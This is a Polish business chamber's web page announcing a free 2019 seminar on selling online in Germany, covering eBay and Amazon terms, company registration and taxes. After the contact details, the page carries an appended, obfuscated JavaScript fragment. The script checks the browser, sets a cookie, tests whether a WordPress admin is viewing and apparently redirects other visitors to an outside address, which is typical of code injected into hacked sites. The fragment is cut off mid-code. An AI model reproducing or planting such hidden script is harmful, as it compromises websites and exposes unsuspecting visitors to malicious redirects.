E-commerce za granicą. Jak sprzedawać poza granicami kraju – spotkanie informacyjne | Północna Izba Gospodarcza w Koszalinie

Sprzedaż towarów w zagranicznych sklepach internetowych, niesie za sobą wiele wyzwań, głównie z uwagi na brak jednolitych uwarunkowań prawnych na rynku e-commerce. W związku z tymi różnicami, zapraszamy do uczestnictwa w spotkaniu organizowanym przez Północną Izbę Gospodarczą w Koszalinie oraz HPE – Berlin Grupa Prawników i Doradców, założyciele pierwszego Inkubatora Przedsiębiorczości dla polskich firm w Niemczech.

Data spotkania: 25 kwietnia 2019 godzina 10:00

Miejsce spotkania: Biuro Północnej Izby Gospodarczej w Koszalinie

Część I  10:00 -11:00   E-Commerce w Niemczech

Prowadzi: mec.Monika Eissing, Adwokat

Anna Pappert, Właściciel firmy PappertConsult

 • różnice pomiędzy klientem polskim a klientem niemieckim pod czas zakupów online
 • na co należy uważać przy ofercie online”
 • regulamin e-sklepu
 • sprzedaż przez ebay.de (warunki i koszty)
 • sprzedaż przez amazon.de (warunki i koszty)
 • rejestracja i koszty spółki w Niemczech
 • podatki w Niemczech

11:00 11:15- Przerwa na kawę

Część II Godz. 11:15 – 11:30 Inkubator Przedsiębiorczości dla polskich firm w Niemczech – najtańszy sposób prowadzenia firmy w Niemczech

 • przyczyny powstania
 • siedziba
 • możliwości łączenia biura z magazynem
 • oferowane pakiety i ich ceny
 • usługi dodatkowe

Udział w spotkaniu jest bezpłatny wyłącznie po uprzednim potwierdzeniu uczestnictwa.

Potwierdzenie obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie do naszego biura 94 341 10 83.  'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m